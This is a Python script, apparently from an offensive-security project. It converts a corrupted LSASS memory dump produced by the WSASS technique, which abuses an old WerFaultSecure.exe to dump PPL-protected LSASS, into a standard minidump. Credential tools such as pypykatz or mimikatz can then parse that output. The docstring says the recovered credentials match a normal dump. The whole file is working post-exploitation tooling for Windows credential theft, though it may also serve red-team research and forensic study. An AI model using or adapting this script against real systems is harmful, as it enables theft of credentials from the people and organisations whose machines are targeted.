|
#!/usr/bin/env python3 |
|
""" |
|
Decode a WerFaultSecure / WSASS "stitched" LSASS dump into a standard minidump. |
|
|
|
Background |
|
---------- |
|
The WSASS technique (https://github.com/TwoSevenOneT/WSASS) dumps PPL-protected |
|
LSASS using an out-of-date WerFaultSecure.exe. On a modern OS that binary is no |
|
longer ABI-compatible with the host's wer.dll/faultrep.dll, and the WER |
|
"stitched minidump" writer ends up mis-driving MiniDumpWriteDump: file seeks in |
|
the I/O callback are dropped, so memory writes are *appended* instead of placed. |
|
|
|
The result keeps a valid 'MDMP' magic but is otherwise non-standard and cannot be |
|
parsed by pypykatz or mimikatz: |
|
* the MINIDUMP_HEADER's NumberOfStreams / StreamDirectoryRva are stale (point at |
|
offset 0x20, which actually holds SystemInfo stream data); |
|
* the real stream directory is relocated to the end of the file, and its stream |
|
RVAs are *logical* offsets that do not match the physical file layout; |
|
* process memory is written as a (VA,size) descriptor array plus a heavily |
|
duplicated set of partial "passes", interleaved with ~340 MB of WER auxiliary |
|
module-image data. |
|
|
|
This tool reconstructs a clean minidump (SystemInfo + ModuleList + MemoryList) |
|
that standard tools can parse. The ModuleList is rebuilt from the PE images found |
|
in the recovered memory. Validated on a Win11 24H2 (Build 26100) sample: the |
|
recovered credentials are byte-identical to a normal MiniDumpWriteDump dump of the |
|
same machine. |
|
|
|
Usage: python3 werfault_decode.py <input.werdump> <output.minidump> |
|
""" |
|
import struct, sys, re, bisect |
|
|
|
def decode(SRC, DST): |
|
raw = open(SRC, 'rb').read(); sz = len(raw) |
|
u16 = lambda o: struct.unpack('<H', raw[o:o+2])[0] |
|
u32 = lambda o: struct.unpack('<I', raw[o:o+4])[0] |
|
u64 = lambda o: struct.unpack('<Q', raw[o:o+8])[0] |
|
|
|
if raw[:4] not in (b'MDMP', b'\x89PNG'): |
|
print("[!] not an MDMP/PNG-magic file, continuing anyway") |
|
|
|
# 1) locate the Memory64 (VA,size) descriptor array: longest ascending run of |
|
# 16-byte (VA in user space, page-aligned size) records, searched unaligned. |
|
print("[*] locating memory descriptor array ...") |
|
best = (0, 0) |
|
# scan front region (descriptors live in the metadata area, well before the bulk) |
|
limit = min(sz, 0x200000) |
|
def good(v, d): |
|
return 0x10000 <= v < 0x7fffffffffff and d and d % 0x1000 == 0 and d <= 0x40000000 |
|
o = 0x20 |
|
while o < limit: |
|
if good(u64(o), u64(o+8)): |
|
c = 0; p = o; prev = 0 |
|
while p+16 <= sz: |
|
v = u64(p); d = u64(p+8) |
|
if good(v, d) and v >= prev: |
|
prev = v; c += 1; p += 16 |
|
else: |
|
break |
|
if c > best[0]: |
|
best = (c, o) |
|
o += 1 # check every offset; the array is not 8-aligned |
|
run_n, run_off = best |
|
run_end = run_off + run_n*16 |
|
# The longest ascending run may include a few tiny leading system regions that are not |
|
# part of the real Memory64 array, shifting all cumulative offsets. Pick the start that |
|
# makes the duplicated-pass BCRYPT key-handle anchors collapse onto the fewest shared |
|
# bases (i.e. self-consistent passes) -- a strong, content-independent signal. |
|
from collections import Counter as _C |
|
key_anchors = [] # (file_off, key_va) |
|
for m in re.finditer(bytes([0x52,0x55,0x55,0x55]), raw): # 'RUUU' |
|
st = m.start()-4 |
|
if st < 0 or st+0x28 > sz: continue |
|
kp = u64(st+16) |
|
if raw[st+0x24:st+0x28] == b'KSSM' and 0x1b0000000000 <= kp < 0x200000000000: |
|
key_anchors.append((st, kp-0x20)) |
|
def start_quality(start_off): |
|
n = (run_end - start_off)//16 |
|
ds_ = [(u64(start_off+k*16), u64(start_off+k*16+8)) for k in range(n)] |
|
cu = [0] |
|
for va, dd in ds_[:-1]: cu.append(cu[-1]+dd) |
|
st_ = [d[0] for d in ds_] |
|
v = _C() |
|
for fo, kva in key_anchors: |
|
i = bisect.bisect_right(st_, kva)-1 |
|
if i >= 0 and ds_[i][0] <= kva < ds_[i][0]+ds_[i][1]: |
|
v[fo - cu[i] - (kva-ds_[i][0])] += 1 |
|
return v.most_common(1)[0][1] if v else 0 |
|
beststart = (-1, run_off) |
|
for s in range(run_off, run_off+0x200, 16): |
|
q = start_quality(s) |
|
if q > beststart[0]: |
|
beststart = (q, s) |
|
DESC = beststart[1] |
|
# Trim leading tiny system pages (e.g. KUSER_SHARED_DATA @0x7ffe0000) that precede the |
|
# real Memory64 array and otherwise skew every cumulative offset. |
|
while DESC+16 <= run_end: |
|
va0 = u64(DESC); sz0 = u64(DESC+8) |
|
if 0x7ffe0000 <= va0 < 0x7fff0000 and sz0 <= 0x2000: |
|
DESC += 16 |
|
else: |
|
break |
|
ndesc = (run_end - DESC)//16 |
|
descs = [(u64(DESC+k*16), u64(DESC+k*16+8)) for k in range(ndesc)] |
|
cum = [0] |
|
for va, ds in descs[:-1]: |
|
cum.append(cum[-1]+ds) |
|
total = cum[-1] + descs[-1][1] |
|
starts = [d[0] for d in descs] |
|
print(f" descriptor array @0x{DESC:x}: {ndesc} regions, {total/1024/1024:.1f} MB") |
|
|
|
def score(fo, size): |
|
if fo < 0 or fo+size > sz: return -1 |
|
n = min(size, 0x2000); c = 0 |
|
for q in range(fo, fo+n, 8): |
|
v = u64(q) |
|
if (0x1b0000000000 <= v < 0x200000000000 or 0x3000000000 <= v < 0x3500000000 |
|
or 0x7ff000000000 <= v < 0x800000000000): |
|
c += 1 |
|
return c |
|
|
|
# 2) candidate "pass" bases: derived from duplicated copies of a low region, plus |
|
# a module end-blob base found by aligning module first-pages to MZ headers. |
|
print("[*] finding memory-pass bases ...") |
|
# PE images in the file |
|
pe = [] |
|
for m in re.finditer(b'MZ', raw): |
|
off = m.start() |
|
if off+0x40 <= sz: |
|
e = u32(off+0x3c) |
|
if 0 < e < 0x1000 and off+e+4 <= sz and raw[off+e:off+e+4] == b'PE\x00\x00': |
|
pe.append(off) |
|
pe_set = set(pe) |
|
# module-first-page descriptors: size 0x1000, high VA |
|
modpages = [k for k in range(ndesc) if descs[k][1] == 0x1000 and descs[k][0] >= 0x7ff000000000] |
|
from collections import Counter |
|
votes = Counter() |
|
for k in modpages: |
|
for po in pe: |
|
b = po - cum[k] |
|
if 0x1000000 <= b < sz: |
|
votes[b] += 1 |
|
endblob = votes.most_common(1)[0][0] if votes else 0 |
|
|
|
# collect duplicated-pass bases from co-located BCRYPT key handles (robust anchors). |
|
# Each pass writes the heap regions in cumulative order at its own base; the EARLIEST |
|
# pass (lowest base) is the complete "block 0" we use for heaps. |
|
def di(va): |
|
i = bisect.bisect_right(starts, va)-1 |
|
return i if (i >= 0 and descs[i][0] <= va < descs[i][0]+descs[i][1]) else None |
|
anchor_bases = set() |
|
for m in re.finditer(bytes([0x52,0x55,0x55,0x55]), raw): # 'RUUU' |
|
st = m.start()-4 |
|
if st < 0 or st+0x28 > sz: continue |
|
kp = u64(st+16) |
|
if raw[st+0x24:st+0x28] == b'KSSM' and 0x1b0000000000 <= kp < 0x200000000000: |
|
i = di(kp-0x20) |
|
if i is not None: |
|
b = st - cum[i] - ((kp-0x20)-descs[i][0]) |
|
if 0 <= b < sz: anchor_bases.add(b) |
|
heapbase = min(anchor_bases) if anchor_bases else (DESC+ndesc*16+0x2000) |
|
bases = sorted(anchor_bases | {heapbase, endblob}) |
|
print(f" module end-blob base @0x{endblob:x}; heap base @0x{heapbase:x}; {len(bases)} passes") |
|
|
|
# 3) per-region source selection. |
|
# * high-VA module/stack regions come from the end-blob (one coherent late pass); |
|
# * low heap regions come from the first complete pass (heap base); |
|
# * the small band in between (not covered by the first pass) is taken from whichever |
|
# pass gives the most valid intra-dump pointers. |
|
print("[*] selecting per-region sources ...") |
|
modstart = next((k for k in range(ndesc) if descs[k][0] >= 0x7ff000000000), ndesc) |
|
# capacity of the first heap pass = distance to the next copy of the descriptor array |
|
sig = raw[DESC:DESC+32] |
|
nxt = raw.find(sig, DESC+16) |
|
heap_cap = (nxt - heapbase) if nxt != -1 else (cum[modstart] if modstart < ndesc else cum[-1]) |
|
src = [0]*ndesc |
|
for k in range(ndesc): |
|
va, ds = descs[k] |
|
if k >= modstart: |
|
src[k] = endblob + cum[k] |
|
elif cum[k] < heap_cap: |
|
src[k] = heapbase + cum[k] |
|
else: |
|
best = (-1, heapbase+cum[k]) |
|
for B in bases: |
|
s = score(B+cum[k], ds) |
|
if s > best[0]: best = (s, B+cum[k]) |
|
src[k] = best[1] |
|
|
|
# 4) rebuild ModuleList from PE images (names from export directory) |
|
def va2off(va): |
|
i = bisect.bisect_right(starts, va)-1 |
|
if i >= 0 and descs[i][0] <= va < descs[i][0]+descs[i][1]: |
|
return src[i]+(va-descs[i][0]) |
|
return None |
|
def parse_pe(fo, img_va): |
|
if fo is None or raw[fo:fo+2] != b'MZ': return None |
|
e = u32(fo+0x3c) |
|
if not (0 < e < 0x1000) or raw[fo+e:fo+e+4] != b'PE\x00\x00': return None |
|
fh = fo+e+4; ts = u32(fh+4); opt = fh+20 |
|
if u16(opt) != 0x20b: return None |
|
soi = u32(opt+0x38); cs = u32(opt+0x40); name = None; er = u32(opt+0x70) |
|
if er: |
|
eo = va2off(img_va+er) |
|
if eo: |
|
no = va2off(img_va+u32(eo+0x0c)) |
|
if no: |
|
end = raw.find(b'\x00', no) |
|
try: name = raw[no:end].decode('latin1') |
|
except Exception: name = None |
|
return soi, ts, cs, name |
|
modules = [] |
|
for k in range(ndesc): |
|
fo = src[k] |
|
if raw[fo:fo+2] != b'MZ': continue |
|
pe_ = parse_pe(fo, descs[k][0]) |
|
if not pe_: continue |
|
soi, ts, cs, name = pe_ |
|
modules.append((descs[k][0], soi, ts, cs, name or "mod_%x.dll" % descs[k][0])) |
|
print(f" reconstructed {len(modules)} modules") |
|
|
|
# SystemInfo lives near file start; the directory's SystemInfo stream is the 56 bytes |
|
# whose ProcessorArchitecture is sane. We scan a small window for it. |
|
sysinfo = None |
|
for o in range(0x20, 0x400): |
|
arch = u16(o); maj = u32(o+8); build = u32(o+0x10) |
|
if arch in (0, 9) and maj == 10 and 1000 < build < 100000: |
|
sysinfo = bytearray(raw[o:o+56]); break |
|
if sysinfo is None: |
|
sysinfo = bytearray(56); struct.pack_into('<H', sysinfo, 0, 9) |
|
struct.pack_into('<I', sysinfo, 8, 10) |
|
struct.pack_into('<I', sysinfo, 24, 0) # zero CSDVersionRva |
|
|
|
# 5) emit standard minidump |
|
out = bytearray(); NS = 3; dir_rva = 32; out += b'\x00'*(dir_rva+NS*12) |
|
sysinfo_rva = len(out); out += sysinfo |
|
modlist_rva = len(out); names_base = modlist_rva+4+len(modules)*108 |
|
nb = bytearray(); nrvas = [] |
|
for (va, soi, ts, cs, nm) in modules: |
|
nrvas.append(names_base+len(nb)); enc = nm.encode('utf-16-le') |
|
nb += struct.pack('<I', len(enc))+enc+b'\x00\x00' |
|
ml = bytearray(struct.pack('<I', len(modules))) |
|
for (va, soi, ts, cs, nm), nr in zip(modules, nrvas): |
|
r = bytearray(108); struct.pack_into('<QIIII', r, 0, va, soi, cs, ts, nr); ml += r |
|
out += ml; out += nb |
|
memlist_rva = len(out); tbl = memlist_rva+4 |
|
out += b'\x00'*(4+ndesc*16) |
|
recs = [] |
|
for k in range(ndesc): |
|
va, ds = descs[k]; so = src[k] |
|
data = raw[so:so+ds] |
|
if len(data) < ds: data = data.ljust(ds, b'\x00') |
|
rva = len(out); out += data; recs.append((va, ds, rva)) |
|
struct.pack_into('<I', out, memlist_rva, ndesc) |
|
for i, (va, ds, rva) in enumerate(recs): |
|
struct.pack_into('<QII', out, tbl+i*16, va, ds, rva) |
|
struct.pack_into('<I', out, 0, 0x504d444d); struct.pack_into('<I', out, 4, 0xa793) |
|
struct.pack_into('<I', out, 8, NS); struct.pack_into('<I', out, 12, dir_rva) |
|
for i, (t, s, r) in enumerate([(7, len(sysinfo), sysinfo_rva), |
|
(4, len(ml)+len(nb), modlist_rva), |
|
(5, 4+ndesc*16, memlist_rva)]): |
|
struct.pack_into('<III', out, dir_rva+i*12, t, s, r) |
|
open(DST, 'wb').write(out) |
|
print(f"[+] wrote {DST}: {len(out)/1024/1024:.1f} MB ({len(modules)} modules, {ndesc} memory ranges)") |
|
|
|
if __name__ == '__main__': |
|
if len(sys.argv) != 3: |
|
print(__doc__); sys.exit(1) |
|
decode(sys.argv[1], sys.argv[2]) |